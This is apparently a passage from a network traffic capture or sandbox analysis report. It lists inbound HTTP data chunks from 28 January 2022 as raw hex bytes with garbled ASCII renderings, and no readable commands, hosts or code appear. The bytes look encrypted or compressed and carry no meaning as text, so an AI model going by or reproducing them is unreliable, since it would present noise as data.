                                                                                              2022-01-28 18:02:56 UTC1108INData Raw: 98 7e 48 bf 23 d4 98 e1 e9 b1 64 b1 4f 78 4e 25 d1 86 16 d3 3a fe 39 07 15 b6 47 7b 10 cc dd 87 a9 01 83 17 38 e9 01 bb af 7a a9 53 01 40 e0 48 67 4b 1c 73 e5 33 55 f0 14 5e 9d 0c 9a 6a cd e7 62 b2 c7 38 0a 9c 7a 08 93 be 46 a5 05 8d b7 3b 91 86 61 cd 79 cc 80 aa dd f7 c2 5b c9 ac f5 b4 fa 52 c3 b0 e9 e2 7f 31 66 e3 26 45 1b 38 e0 c0 99 88 5e 41 7c d4 f2 e0 11 c1 46 1e 97 f5 84 e4 78 9b 4d 39 e8 73 89 59 f8 19 a4 8a 6b 3d fa da eb dc ed 42 df bf 2e 36 01 bf 10 09 62 b0 f6 fc 67 fe c6 c8 3a 61 03 c3 00 b6 c8 40 b0 aa 79 00 b9 d8 7c 16 ab 65 53 d8 8e 2f 74 54 e0 11 dc 7a f2 32 49 7e 7d 0f 05 7f c0 a1 9d 16 47 08 86 bb 36 0b 2c 1d f4 1b 28 10 60 b0 6c c1 a4 88 58 ed ef de 91 5d 20 7e 4a ff 1a fb 65 db e4 05 37 8b 9b 2b ab 78 79 1f da 1a e1 b1 22 67 0a 93 fc
                                                                                              Data Ascii: ~H#dOxN%:9G{8zS@HgKs3U^jb8zF;ay[R1f&E8^A|FxM9sYk=B.6bg:a@y|eS/tTz2I~}G6,(`lX] ~Je7+xy"g
                                                                                              2022-01-28 18:02:56 UTC1109INData Raw: 8e cc 47 4d b4 1d fb 76 b8 d9 03 3e 19 46 8c 09 b4 fa 38 30 aa 05 c3 23 4c f2 ab 4e f8 38 88 3c 3f 1f ca b2 c5 ae 75 7d 19 95 67 01 64 bc e0 4d da 57 b5 8d ec 2a a2 22 05 38 0c ae 19 e6 2f 2a b0 27 a0 80 58 0a 32 e7 61 01 07 92 c7 62 26 b7 6e 46 af 80 47 42 ef 4c 26 23 65 69 90 a2 be e8 a8 27 77 0a 43 88 b9 97 77 04 4c 0f 19 23 21 34 cc 62 5f ff 7f 2d 7a 89 38 c3 df 7a 85 37 39 b3 75 dc 0c ea b1 c1 18 9f 1a 45 95 22 60 4e 5e 9d 65 b0 fc f8 de d6 6d 28 13 d2 7b 5a 98 09 e2 0d 6b eb f3 d8 83 6f 28 25 d9 69 3d 1f 3a f7 60 81 a1 6d 89 8e ab f7 b3 c8 44 22 0a b7 f9 ec 68 8a 2d e3 0e c4 d4 65 b0 a1 8c fc 5f 8d 82 59 40 f4 f3 80 13 1a ad aa ec 85 fd 1f 4b 42 ef ec 97 da 4f 28 2c 32 a0 e2 f0 03 17 26 0b 0d 74 3f 6a 97 52 9d 51 9d 0e 1e ce 79 70 b9 64 2e d7 14 43
                                                                                              Data Ascii: GMv>F80#LN8<?u}gdMW*"8/*'X2ab&nFGBL&#ei'wCwL#!4b_-z8z79uE"`N^em({Zko(%i=:`mD"h-e_Y@KBO(,2&t?jRQypd.C
                                                                                              2022-01-28 18:02:56 UTC1111INData Raw: 34 33 81 a5 ed ee 35 b8 d5 22 a9 93 39 ce 83 f0 c8 4e 4e c5 3a 15 7b 99 07 01 ff c5 76 56 2b 47 ef e2 40 d6 ff 4b f8 a9 5e 54 03 d1 78 9a e9 04 84 70 9f 09 94 bf cc 61 b8 e5 fb 82 d7 99 e4 dc 4f 6b 4c f4 25 2b ee 88 a0 42 5e 18 88 a9 76 5a a2 2d 46 04 d4 9d 82 7e 84 90 2c a8 8f c6 b1 05 0e 9e 1f 2b 45 ff 83 fc 32 ae 7e e1 fd d0 db e6 43 f4 b6 f1 1f d0 a0 11 16 64 d0 1f 53 a4 e1 72 7d 6e e8 5c ad fe e9 e5 31 85 a0 9b 6d 8e 44 70 3a 12 ec ae 58 bd da 91 65 3b ac c6 40 40 e3 3a af 40 1c ea 56 2f 15 c7 c3 fa 0e 70 9e 1c ec 3a f7 b2 a5 c3 fa a6 ec 6e f9 85 41 51 2d ab 72 68 4b 77 ee 61 ce 80 a5 73 84 47 61 31 d9 ed d0 39 ea bf b4 79 cc 48 f8 77 de 0b 2c 12 cf 0c 70 4b 71 f1 58 6f 12 68 ea 6e 6e 0a ab 85 34 de 7e 4a c1 a8 04 07 70 f7 fd 69 df f7 d5 fd ff 68 17
                                                                                              Data Ascii: 435"9NN:{vV+G@K^TxpaOkL%+B^vZ-F~,+E2~CdSr}n\1mDp:Xe;@@:@V/p:nAQ-rhKwasGa19yHw,pKqXohnn4~Jpih
                                                                                              2022-01-28 18:02:56 UTC1112INData Raw: 87 a8 6d 9d 0e a3 7e 46 eb d5 ed cf 66 64 6c 95 59 de 60 bc d4 aa 81 a0 8b 9d f9 a0 25 9a e5 4c 99 94 30 b0 3a cc f6 c5 c1 8f 99 88 19 01 55 a0 62 56 0d 69 93 80 d7 9c fc de 09 7e e4 4e f7 b1 4f 45 90 3e 63 c1 d7 5d 24 6d 28 e1 e5 6e 5d df 35 86 bf c5 66 80 78 7b 69 76 fe 0f db f6 36 32 d1 d5 7a 90 39 e6 95 a9 c8 d7 0b 2b d3 a6 9a e7 c8 c0 02 f4 d4 67 b7 6d 14 5b db c1 44 32 71 a7 1d 24 90 19 7f 4d de 12 19 77 d7 6e 87 d8 6e 7b e9 a4 00 36 08 09 91 26 6f 7c 3e 1f ca 77 2e 4d 37 1e 4d b0 85 dd fd 63 e4 7a 06 07 38 ab 3f 91 bc 34 cf 74 8f fb e0 ad 38 bb 39 9d e9 3e ed 3d 73 0f 48 83 a5 d1 66 75 19 52 a8 d6 6b 95 2f 82 5b 3c 25 e5 31 aa 9a 8c b3 c4 4a c0 31 fa b0 61 29 2a a0 05 7a d7 99 46 44 18 5a a0 89 3e 2c f0 24 b2 b6 f1 a6 6c 63 9a 73 07 56 e0 13 e7 cb
                                                                                              Data Ascii: m~FfdlY`%L0:UbVi~NOE>c]$m(n]5fx{iv62z9+gm[D2q$Mwnn{6&o|>w.M7Mcz8?4t89>=sHfuRk/[<%1J1a)*zFDZ>,$lcsV
                                                                                              2022-01-28 18:02:56 UTC1113INData Raw: d6 df 07 81 34 3e d8 51 3c 71 2e 07 87 77 c0 36 08 f1 a9 5d 47 9e e1 f8 04 bb 6e f0 32 e2 4a fe 48 f8 3e 92 cb f4 2c 11 db e9 ea 13 d1 55 16 96 9f e0 8d cf f4 ac c2 2f 3d e0 16 f7 af b4 c9 3b ee 58 dd c0 b9 4f 4e fb 6e d7 84 b3 13 4b 1b 62 91 32 c7 31 2b b3 a2 d4 aa 19 28 1f a8 66 b4 a1 a2 27 48 08 ae c6 87 d4 12 f3 ae 87 55 61 09 0e 9c 0e 79 b8 a3 6e ba 66 9c ec a7 55 63 0f e1 07 c7 0e e1 7e f9 8c 33 f5 b1 46 04 5e a7 17 c3 7e 72 5e ae 0d dc 42 15 60 dd 93 aa 87 ba 5c 92 71 29 a7 6d ed 12 5f 4c 65 0c 3b d4 a9 55 b4 df 43 36 07 3e 1c 42 6f ed ea cf 17 81 57 e0 fe a8 db f1 bb 06 13 01 0b ce b8 b6 a2 5c ae 7e c2 f8 a0 20 3c 17 f5 d5 f6 cf 43 50 ce 8c 5d b4 26 a0 5b 65 32 39 89 b7 52 cf 32 c8 13 9a 85 e9 08 a3 af 40 89 ff e7 25 2c 68 87 e9 d6 f9 3d aa 2f b5
                                                                                              Data Ascii: 4>Q<q.w6]Gn2JH>,U/=;XONnKb21+(f'HUaynfUc~3F^~r^B`\q)m_Le;UC6>BoW\~ <CP]&[e29R2@%,h=/
                                                                                              2022-01-28 18:02:56 UTC1115INData Raw: 98 7e 8b 53 85 e7 fa 39 b1 38 8b a6 ef 95 b6 f3 2a 45 e4 22 50 f7 a0 27 9e f1 eb 2f a7 0d 6d 33 ae 62 81 bc 31 46 ee 68 b3 76 f5 85 e2 4a fe 0a 66 cb 7d 1d 2a ef 90 27 a0 25 b8 4b 72 4d 43 54 de 98 52 b9 86 52 a8 63 5b c5 0c a5 6e 9b 15 83 c4 85 df 01 d2 a4 d5 1c 41 01 c6 21 bd b2 52 cb 67 03 0e 9f 73 f4 4e 2e 1d a3 71 46 e3 ce b3 bd f9 c0 cf 9a 0b 23 c9 0c 94 d1 56 b8 42 e4 ae 1f cf 38 3a 22 c9 77 93 b0 2d a4 da 62 50 d3 63 dc 99 51 4d 4f 06 8e b9 da 69 90 25 ea 63 a0 78 4b 43 5d c5 db ea 50 fb be c7 db 36 61 52 45 68 d0 95 bb 69 e2 d2 f6 a5 e3 f9 97 8f ad 49 91 fa 88 cb 37 70 62 b6 f6 74 66 01 5f 42 a5 bd 26 60 b1 ad 3c 75 06 6c 49 77 d2 d7 ed a4 65 32 45 64 8f a8 60 cd 3a 21 d6 8a ab 78 7e 43 55 d9 18 b1 3a 60 2f 82 f7 8d a7 58 37 59 4d 3b 09 20 b7 d7
                                                                                              Data Ascii: ~S98*E"P'/m3b1FhvJf}*'%KrMCTRRc[nA!RgsN.qF#VB8:"w-bPcQMOi%cxKC]P6aREhiI7pbtf_B&`<ulIwe2Ed`:!x~CU:`/X7YM;
                                                                                              2022-01-28 18:02:56 UTC1116INData Raw: 83 fc 8e 14 6d 28 84 1b a1 73 0a 95 bb 5d 14 09 e0 82 0a e8 62 ba 54 48 7c 87 2e 34 38 37 84 75 cd 00 84 4d d7 ea b2 25 e3 c5 38 05 7f 26 b0 c4 d4 a2 16 12 f2 15 0a 99 b8 e1 6e e4 bc 3f d8 03 0d 22 d4 7d 82 a8 39 85 a1 73 08 db 98 3c 15 90 b6 5a ee 9c 0e 93 6a a0 2b ea 7a 09 18 7b 10 24 38 f6 2b 17 94 a7 87 de ec 4b ed db 8b a1 aa 71 27 7e 73 e5 f3 1a 38 f9 eb af 84 6d 6b ef 80 b9 b1 7b 94 39 bf a6 13 c9 e9 92 a0 09 1b 4c ae 4a bf a6 1f f7 79 ce 01 33 b8 d2 0c 23 83 58 b7 63 07 38 7a 8c d5 48 c4 ba e6 31 25 23 24 09 17 ca 8e 18 8f ec 5a a0 1f ee 2b a7 5c d9 e5 ad 44 aa fd 70 25 b5 ac e0 17 17 05 1e 8d 93 86 53 69 37 87 e6 b8 16 0a 76 4e ac 11 09 26 60 b8 07 ec a5 94 c2 db 0c 74 6a 88 19 79 6f cf 95 4f a0 09 66 8a 5e 43 77 01 4a fc 08 93 aa 56 e3 cf f6 c6
                                                                                              Data Ascii: m(s]bTH|.487uM%8&n?"}9s<Zj+z{$8+Kq'~s8mk{9LJy3#Xc8zH1%#$Z+\Dp%Si7vN&`tjyoOf^CwJV
                                                                                              2022-01-28 18:02:56 UTC1117INData Raw: 15 ab 0b c5 b9 1d f2 85 14 04 7a 02 d7 a3 9b 21 87 b3 4f 5c 7f 79 30 aa 10 2f b6 99 64 37 e5 5a c1 84 13 84 7b 0e 0b e3 52 a0 f5 8c 47 1c d0 b4 ae 4b 9d ca c4 47 76 e3 17 ba b5 d5 16 2c e8 3a 14 c1 dd 53 c0 23 15 08 2c a0 bd 29 05 0b 80 44 85 17 a4 57 37 79 03 a0 2f dc 71 30 93 59 57 13 e1 e3 bc 53 d6 62 17 e4 87 f4 db 2f cc 6a 46 cc 2e 06 8e 27 77 f9 13 b8 b2 fa 47 4b a5 db cb 97 24 cb 54 3e db 5f 12 80 45 67 37 a2 9b ae 10 45 d5 5f 35 3c f4 79 69 c1 f8 5c c5 4e ff 5a ac c2 ab ea 18 f7 3c 66 45 d5 b5 09 dc b7 94 96 72 96 77 e2 49 92 90 49 e0 bd 42 61 65 c3 e9 30 15 49 5c bd 70 f0 a1 66 21 bc 50 d5 68 6f ee a3 77 6c 19 71 eb d9 68 97 c9 48 7d 04 be 5d fa 46 1a a1 fb 0b 85 6b 32 c0 96 51 ee ca 6f be cc 1f b7 a1 6c c5 ee 52 fe 7f 26 bd 32 ee 59 1f 52 c4 14
                                                                                              Data Ascii: z!O\y0/d7Z{RGKGv,:S#,)DW7y/q0YWSb/jF.'wGK$T>_Eg7E_5<yi\NZ<fErwIIBae0I\pf!PhowlqhH}]Fk2QolR&2YR
                                                                                              2022-01-28 18:02:56 UTC1119INData Raw: f8 58 d3 19 8d b5 9c 3d a6 d8 64 8e 65 ff 87 b4 cd 06 85 ea b2 63 38 0b f1 ad 90 6f 7a 88 54 6f 6e 1d 52 f8 2d 47 f6 0e 07 85 da 94 c5 3f dd 7d fe a9 94 05 39 73 a8 8e 22 55 d4 0b f5 8d 25 c4 e2 97 f9 0e 0a 66 94 7a 6c a7 3a 1f 1c da 49 f0 dd cf df ce e2 44 db e4 d9 6e 23 84 ca fb be 99 b5 3e ea b9 5d 24 5b 17 9b 17 1e b8 d2 9a 06 8f 93 0a 8d ac ff 6b 45 0b 14 9d bc 9f 99 73 dc 93 18 1e ab 7a 08 63 7d c8 8e 68 57 6f fe f1 59 cb 77 0d 0e 97 87 d8 9e 31 da 0b 10 53 6f 6a 74 71 1f c5 32 3b 80 5f 70 a9 ba 38 dd 9f 9c 0c f2 cc d0 d2 91 bb a5 f9 d1 ec f9 cf 96 41 95 4b 7d fe 3b 9b e5 50 2a dd b6 b2 cd 02 b6 8c 37 bd 10 e3 ce 64 52 c2 ad 46 db 77 0d 3a 87 04 8b 9e b1 09 8d 38 95 4d ba be a0 26 68 bf 94 71 12 6a 0b 29 d0 d7 e9 d1 fb 97 e5 2a 11 88 e0 ff 1b 1e d0
                                                                                              Data Ascii: X=dec8ozTonR-G?}9s"U%fzl:IDn#>]$[kEszc}hWoYw1Sojtq2;_p8AK};P*7dRFw:8M&hqj)*
                                                                                              2022-01-28 18:02:56 UTC1120INData Raw: ba bf 1d c8 b5 4b 48 f4 bb d5 99 08 dd c1 28 e3 d3 20 65 80 2f a4 71 e5 fd 75 34 67 8d 2d 35 60 04 e9 3b 6d 08 fb bc e1 1b 02 b4 29 96 49 c3 9c ea b0 af 10 54 d9 13 f3 04 04 f5 ff 6e c5 73 74 20 c5 36 eb 05 76 92 4b 7c b6 cb 0d ee 5c a8 47 e6 a5 e1 9b ef 45 91 c9 6f 59 2d cf 72 73 08 76 1d 5a a1 06 8a 3b 98 96 2d 9c 02 75 1f a0 6e 9d 8c 2a f8 5a 05 57 bd 6d 79 08 29 d3 73 f5 dd f8 3d d8 6b ed 24 23 a1 9e 27 13 85 50 2b 4e 7f a2 1a 75 75 b4 c9 3b 9f af f5 2b e4 db 0f 0c 28 5a 98 32 b5 60 bc ec 52 c6 3c 92 71 8a cc 29 8b 2b 3d 8f 82 03 eb c2 27 45 52 54 38 a5 19 00 ea e5 aa cb 3e 15 5c 66 70 74 2d c5 3d a7 8b 82 39 f0 29 a6 e4 e1 5e 4f 1c 38 75 d8 63 3b da 9d 3f fd bb 61 09 18 75 e6 e5 a2 ff 6c 21 b4 c9 02 fe 8c 16 ab 7b fc 32 c4 f2 54 45 5f 45 65 3b ad 9d
                                                                                              Data Ascii: KH( e/qu4g-5`;m)ITnst 6vK|\GEoY-rsvZ;-un*ZWmy)s=k$#'P+Nuu;+(Z2`R<q)+='ERT8>\fpt-=9)^O8uc;?aul!{2TE_Ee;
                                                                                              2022-01-28 18:02:56 UTC1124INData Raw: 5a d5 ea b1 8a 21 ef ab 43 07 e3 25 1f b8 d8 6b eb 4e ca 4f d4 fd fb 78 8b ab 7f cc 69 e8 c7 3a 2f b8 5b b5 3d 6c 57 65 5e 34 65 b9 c8 be b9 af 7b cc 64 f5 c1 e1 73 e3 6a 01 df 09 a7 1f 8b 94 f1 32 42 48 37 49 83 86 3f ac f5 0e e5 51 dc 83 29 24 65 3d 99 e0 06 1e 78 21 cb 04 8a b4 d0 e0 95 50 59 25 ea 6b 95 31 bc 73 ba ec 50 2d 49 d9 9e 2c 2f 53 a8 4b 10 67 07 97 84 0f e8 5a dd 97 65 d5 03 0d 2d a1 07 91 3e 28 7a 87 dc 4a 08 8d c0 58 21 54 e1 f3 ec 3f 17 fd 67 2c 24 5f d2 de 00 30 a1 14 9d b0 54 99 1e 8c cb e7 b2 cc 80 74 f9 d7 04 66 f2 24 67 03 33 c2 fd 80 4f bf da f4 13 e7 f1 3e 77 1a 9f f2 2a 14 67 95 d8 e6 70 40 a1 9e 16 91 5d 52 fc 32 0d fd 97 e5 07 10 1a 86 7d fe 37 ba 21 31 32 08 d0 a4 3e ea 5a d6 6f 1b 7d 91 54 37 21 b9 68 89 43 db 07 ec c1 2a 2e
                                                                                              Data Ascii: Z!C%kNOxi:/[=lWe^4e{dsj2BH7I?Q)$e=x!PY%k1sP-I,/SKgZe->(zJX!T?g,$_0Ttf$g3O>w*gp@]R2}7!12>Zo}T7!hC*.
                                                                                              2022-01-28 18:02:56 UTC1128INData Raw: 91 18 01 b3 b9 9f 13 51 3f 02 8f 5b 74 5d 24 71 8a 68 87 d7 0a 9a 6b 98 e3 a7 b8 4f 45 e6 c9 0c 9c 5d 20 7d 01 26 3b 02 1f 5a b4 81 57 a0 20 ae c1 4b fa 88 7b 74 e0 9a a2 75 0e 4d 70 6c 49 4e 3a d0 d2 60 65 34 9b e2 b9 83 c6 ca 3d df 74 e3 88 97 be 7c 06 7d 70 98 87 c3 e7 c3 43 03 ff 05 0f d0 0a c0 92 30 cc 43 03 9f f0 ad 7d 39 a0 22 54 5d c8 31 b8 58 46 d1 d8 46 db ef 59 e3 a1 77 a1 2a eb 78 10 6c 75 77 81 6e e9 3e 9d 83 2e a4 97 7c 14 07 d9 99 3a 6a 6a 1b 79 c3 ea 80 ea 33 39 be 98 28 22 50 32 53 2c fe f6 52 12 95 d3 7c 99 d5 63 f8 45 cf 3d 13 15 b3 c4 21 21 de f3 e6 2d e4 c1 b1 64 53 e9 46 b5 0d 8a 97 05 fa 02 45 67 af 04 8b a0 94 b4 52 71 16 f1 65 c6 5f ad 44 ed e2 c1 51 b7 e4 47 63 c9 98 07 31 b2 fe 3b 57 7f ff 82 dc b5 a2 e7 d4 91 b4 c6 24 23 c3 de
                                                                                              Data Ascii: Q?[t]$qhkOE] }&;ZW K{tuMplIN:`e4=t|}pC0C}9"T]1XFFYw*xluwn>.|:jjy39("P2S,R|cE=!!-dSFEgRqe_DQGc1;W$#
                                                                                              2022-01-28 18:02:56 UTC1132INData Raw: c1 2e 72 5d b0 22 a2 c3 06 87 dd 8f 22 62 56 28 21 de 97 7d 9c 6b 03 3d 12 00 4f b4 97 b2 f8 30 48 76 50 c6 42 e7 cd e3 26 34 77 df c8 27 92 d8 a5 b8 b1 2c 1a c9 5f 04 86 a5 95 d4 fd b6 c9 91 8b 86 75 da 2c 57 79 79 84 c4 4e 22 39 e1 ff ba e1 c9 15 fd 8b 21 ef 29 9b 6f f5 85 df c5 31 d6 8f 4f 2a 13 e9 e0 02 1d f0 a0 24 66 b4 25 99 49 e2 73 7d fd 69 f3 ec 64 b8 d6 f3 44 0c 20 45 52 ca e1 7c 48 25 eb d5 2c ac f3 29 a8 1f 3c 12 66 88 55 2f 4f a6 9c 35 b0 f0 aa 6d 22 f6 05 09 22 ca 86 c8 ba 31 42 de 7f f7 b1 26 a5 96 98 01 3c 1b b6 56 ec 2d 9c 3d a6 7b cc 01 36 e0 8d ac c5 06 8e a9 95 46 98 33 b5 71 61 a0 10 5d 24 59 13 09 52 ac 68 82 d3 29 4b 92 32 3e 27 94 59 d4 6e 51 78 73 e2 d3 87 dd b5 49 43 59 c9 ef 79 c6 8e 1d b2 c6 89 88 5b 17 0d 01 44 70 7a 50 1a bb
                                                                                              Data Ascii: .r]""bV(!}k=O0HvPB&4w',_u,WyyN"9!)o1O*$f%Is}idD ER|H%,)<fU/O5m""1B&<V-={6F3qa]$YRh)K2>'YnQxsICYy[DpzP
                                                                                              2022-01-28 18:02:56 UTC1136INData Raw: 3a d2 34 66 21 a4 d2 91 1e 22 c1 3d 71 2b d0 a7 5f 33 85 ea 5b a6 ba ea 55 57 59 a8 0e df 75 f4 a0 01 d3 18 18 4d 4f 7d f7 85 e1 7b d3 2b 94 0e 9b 10 9e 11 6d 1b db fd 02 60 86 82 73 0f e2 4c f3 2b 50 78 1c bd 75 10 15 cf 05 04 26 33 e9 d8 65 3f 96 bf c6 ba 4c af c0 fd 11 97 88 6c aa 8c ce 6d a4 e4 71 16 04 14 95 52 79 f0 1a 43 62 48 00 bb 61 be ca 0e 98 b1 46 ee d6 61 45 6b 05 92 07 86 51 21 31 bb 6a 6f 58 a7 9e f6 d3 73 e5 ce 70 b7 e9 b4 7f 93 2a d4 a0 8f e6 f9 ec ba 04 92 dd 3d d0 7d 23 9e f5 64 ad 97 5d 60 48 23 96 db 24 10 98 cb 40 bc 4f 74 26 5b cc a2 89 3c d6 82 fa 69 6e 6d cb e9 36 cb e7 25 15 0d f2 fc 56 3c de 51 ac 3e 45 91 73 c0 56 0a ba 3d 41 3b 75 3c 43 90 ec 67 f8 f9 81 2d 7a 73 18 b5 41 f7 41 ad 78 f9 b6 34 e2 f7 80 7a 7f b2 62 ae 6e 1e 58
                                                                                              Data Ascii: :4f!"=q+_3[UWYuMO}{+m`sL+Pxu&3e?LlmqRyCbHaFaEkQ!1joXsp*=}#d]`H#$@Ot&[<inm6%V<Q>EsV=A;u<Cg-zsAAx4zbnX
                                                                                              2022-01-28 18:02:56 UTC1140INData Raw: bf 7d 6a e4 b7 e0 1a 98 df c1 49 f2 46 76 50 57 bb 9f ed b2 f6 42 19 c1 22 b7 93 82 24 ae 7d ee de 7d d2 76 54 d2 6e 64 c3 48 f8 34 85 d5 fb 43 2d c8 c8 8a 3f 60 bf 19 09 8c 64 26 6c 4c 0e 99 ea e8 34 e5 1d a5 8a f0 43 85 0d 20 33 2f df 67 30 4a 02 03 63 a6 da 75 14 51 7a 97 42 e8 3d 73 3a 0e ed ec fa d7 e0 76 8a b3 26 3a 1d f8 b3 44 1e d3 57 c3 5d 18 3e fb 82 77 02 56 c8 c3 0b 9e e1 cc b9 b5 1d 7f b1 6e a2 ee 38 6b 08 a4 61 c4 85 55 43 94 36 73 49 d3 e0 e1 8e b6 2b 12 1c a4 1e 2c 44 ee 5e 2a 27 3d ec 69 58 24 59 1d 3c c3 52 ab 46 46 0a ae f3 42 ea 32 56 8b a6 1a 19 91 f0 19 6a 0f 19 f1 21 9c 5f 5d 31 d9 de 64 62 d1 43 81 50 44 0b 2c fb 85 0a 9f 98 37 39 d8 c0 bf dd 21 dc 8a 85 e4 a4 31 85 26 9e 51 c3 ce 41 6e 69 da 8f 56 07 23 32 e4 11 76 8f 63 13 0c 51
                                                                                              Data Ascii: }jIFvPWB"$}}vTndH4C-?`d&lL4C 3/g0JcuQzB=s:v&:DW]>wVn8kaUC6sI+,D^*'=iX$Y<RFFB2Vj!_]1dbCPD,79!1&QAniV#2vcQ
                                                                                              2022-01-28 18:02:56 UTC1144INData Raw: 2a 8f 4a ce 88 55 67 56 3f a1 a4 0e d4 e8 af 59 9b 46 11 f5 1c 27 37 04 8c 24 56 2b 4b 34 3a 17 c2 3c 8d ad a9 64 b1 41 9f 84 23 2a 73 9c e8 b4 f1 af 7d 11 3a 23 4d a1 7a 7a 42 e0 47 0c f4 c4 50 da 56 d2 96 a5 e2 1a 4f 41 61 3e 10 0b 13 ec 58 2f fd e9 73 cd b6 84 38 ef 32 33 33 52 22 e1 e6 41 62 85 2b 60 be 48 34 08 74 b9 57 a7 b4 c1 b1 a5 bf 22 d4 7b 19 b7 52 cf 06 ed c8 7e 2f 20 7e c9 01 77 2e 24 ec 67 aa cd 1e 99 b7 9d 86 d7 e4 d9 0c 4a c0 9d 4f e6 75 d6 fe 60 84 72 54 2b 46 a5 6a 88 67 7e 9b 05 0f 6c 1d c5 02 7e 72 51 ad 3b ec a3 c3 91 66 6a 83 63 8d 35 0f ea 65 39 75 03 12 59 11 d7 81 4f 43 85 da 5a ab 9c 14 09 ee 7d 43 04 0a 1b 66 a1 03 f9 87 53 1a 95 28 2e c3 3e 77 69 e9 32 21 ef 91 bd 54 4e 3d 61 72 5a e3 c3 54 51 74 f0 2a 15 cf e6 56 bb d3 92 1f
                                                                                              Data Ascii: *JUgV?YF'7$V+K4:<dA#*s}:#MzzBGPVOAa>X/s8233R"Ab+`H4tW"{R~/ ~w.$gJOu`rT+Fjg~l~rQ;fjc5e9uYOCZ}CfS(.>wi2!TN=arZTQt*V
                                                                                              2022-01-28 18:02:56 UTC1149INData Raw: 00 b3 c8 39 12 00 8b ab 47 9a ef b4 fd b0 c2 25 ea 26 14 8b e7 c0 aa c2 93 8e f0 b9 59 28 c4 31 dc e0 dd 74 77 3c 03 02 b5 79 f6 33 1a f3 ec 5c 1e 5e c0 8a 6d 83 29 54 dc 44 eb e3 40 83 c1 75 78 7b fb 6f fe 44 db d0 9b ee b1 81 c5 c3 da 2f b1 4f 45 e6 2a 2d ef 90 42 f0 df 21 9e 17 f0 23 95 41 eb e4 46 4d d6 5a af 84 cd 09 8e 2d 7b 57 6f 1e b9 19 45 86 79 49 04 6a 50 ab 1c b0 07 03 7c 4f 1b 6a 8e 15 08 d9 86 bb 09 ae 9b 0a 03 f7 be 35 9d 1a 85 50 f7 30 4d cd 33 66 0a 95 b7 bd fd b3 3a f3 48 a4 d3 17 ca fa 35 9e 8d a7 59 da a7 04 7f 23 cc 81 cc 85 5c d1 2e 6e 16 7a 71 f8 e0 4f 3a ea 5b 1e 49 eb ec 6e 64 aa 89 38 d3 2f 53 5d 4a 1a 99 81 fc 31 4c 77 8f a5 f1 95 a4 60 bc d6 8b eb ba 20 71 1e 22 ac 8a 60 b1 7f 0d c4 01 49 99 fa 02 80 71 f3 72 0d f8 a5 21 4d 84
                                                                                              Data Ascii: 9G%&Y(1tw<y3\^m)TD@ux{oD/OE*-B!#AFMZ-{WoEyIjP|Oj5P0M3f:H5Y#\.nzqO:[Ind8/S]J1Lw` q"`Iqr!M
                                                                                              2022-01-28 18:02:56 UTC1153INData Raw: bd 68 c9 f5 c1 cd 35 a2 93 e4 18 96 90 3a 06 67 6d 34 73 3c d3 16 47 26 16 e1 6e ed 9c 95 b1 65 11 4f 47 9a 00 c9 83 ae 2f b7 cd d7 14 a0 e4 34 59 08 06 b1 94 90 10 79 3a 4a 7c ba a3 01 54 0c bf 44 bb 1c 39 65 9b 2a e4 18 31 43 b4 3f 38 cd 78 d3 77 4d 36 f1 63 b0 97 56 5e a0 03 c8 ec 2e 75 6b bd a2 7c aa a1 1c 1d de fa 7b 3a c9 4f eb db 57 ac 95 9c 42 81 ab 5e 17 58 fd 66 8c 8c 3d 55 cf 61 f2 0a be c5 32 cc 03 95 f8 67 58 03 49 38 fc ef 0d b0 f5 5c 23 1e 36 b8 94 34 bb f8 8f 74 26 ab 12 ea 08 f2 6b 3b ef 0b 42 ad 77 89 33 c0 e3 ab 86 be 38 9c 0c 99 b6 bb d0 1a d7 60 8a 6f ec 08 62 d2 d1 21 60 c3 aa 2c d4 15 4a 65 92 0a 9c e6 9e 05 a5 8f 47 e6 e4 1f d9 c6 0d 5f 0a 2b eb 4c 82 87 92 09 e0 3d 17 db db e1 cb 0c ae be f2 f8 7a dc a2 29 ad 4d 4e 2c 44 9f 51 56
                                                                                              Data Ascii: h5:gm4s<G&neOG/4Yy:J|TD9e*1C?8xwM6cV^.uk|{:OWB^Xf=Ua2gXI8\#64t&k;Bw38`ob!`,JeG_+L=z)MN,DQV
                                                                                              2022-01-28 18:02:56 UTC1157INData Raw: 90 1a ee 43 bc 8e f8 ca 3b 98 78 f2 36 b1 4f 0d 95 af f7 23 68 4f 92 10 82 d9 d2 1b e2 48 16 35 35 7f 8a 5e 90 02 92 a7 96 5b b9 4e 79 55 fb c9 22 fd 0b 5a 0f a6 2c 0b da c3 1c 75 53 ee 23 25 7f c0 1b 6d 38 f2 2e 17 34 01 5a 06 89 61 24 05 67 d5 d7 e6 a4 bf 4d 13 14 ea ea 63 ee 74 df 0c ea 6b 49 70 ee 95 e2 f6 c0 bd 85 04 85 f0 d2 b0 1d 55 c8 57 8d 20 b9 96 28 0b a9 a3 af 8f 65 e3 7b 73 b6 7a c2 60 ea bb f7 b2 47 53 9a 0b 52 e8 e1 b4 cc a8 a9 a7 b6 b9 3d 69 b7 a3 e8 33 c6 3a 81 e4 88 9a 37 ff d4 57 70 8c 98 ff c6 f8 38 ab d1 06 70 be 2d ff b1 de 7d 6a 62 02 65 fb cc ff 21 2c cf b8 3f 74 52 0d c3 e5 3d 27 10 13 b1 e8 a7 a2 99 9d b5 77 3b de 33 a8 5a 84 66 f9 88 67 01 7a b7 59 79 84 1f 79 58 24 01 86 61 ba 08 7b c5 66 e5 f8 14 3f d6 36 2d 96 85 ba ce 84 8b
                                                                                              Data Ascii: C;x6O#hOH55^[NyU"Z,uS#%m8.4Za$gMctkIpUW (e{sz`GSR=i3:7Wp8p-}jbe!,?tR='w;3ZfgzYyyX$a{f?6-
                                                                                              2022-01-28 18:02:56 UTC1161INData Raw: 83 37 5b 29 5f ce 5a 96 38 37 72 80 87 e7 f8 06 fa 27 70 8c 97 3c ad 75 fe d0 9c 74 a5 e0 eb c6 70 87 5b bd a1 19 b3 9e 04 08 26 fd fb 94 e4 0a 4d eb 41 fb 9d 50 86 f4 bf 94 06 b0 29 06 b0 f4 d5 ba b0 2a f7 c0 44 c3 7b 9d 8d a2 ed 8d d0 70 cd 75 9d 85 e4 7e de de e4 71 8a 6d 89 dd 6d 24 b8 46 a6 75 7e 75 49 1b c1 16 87 cb 6b ed 31 cf 66 b3 47 8d 8e 45 8e 5c a8 d6 5f d7 3b e4 9b 5f 38 b8 ad 9c 5d 90 28 13 e6 7f 1e 86 23 a1 e8 38 ba a0 d6 a7 ab 73 45 5b 23 a0 0b 19 c2 a0 1f c9 e9 f0 4c 62 57 8c 46 6c 25 28 de 34 6a 33 8c 40 00 50 02 8d af 41 0f db 0e 3c 56 da 9d 5c c1 d8 82 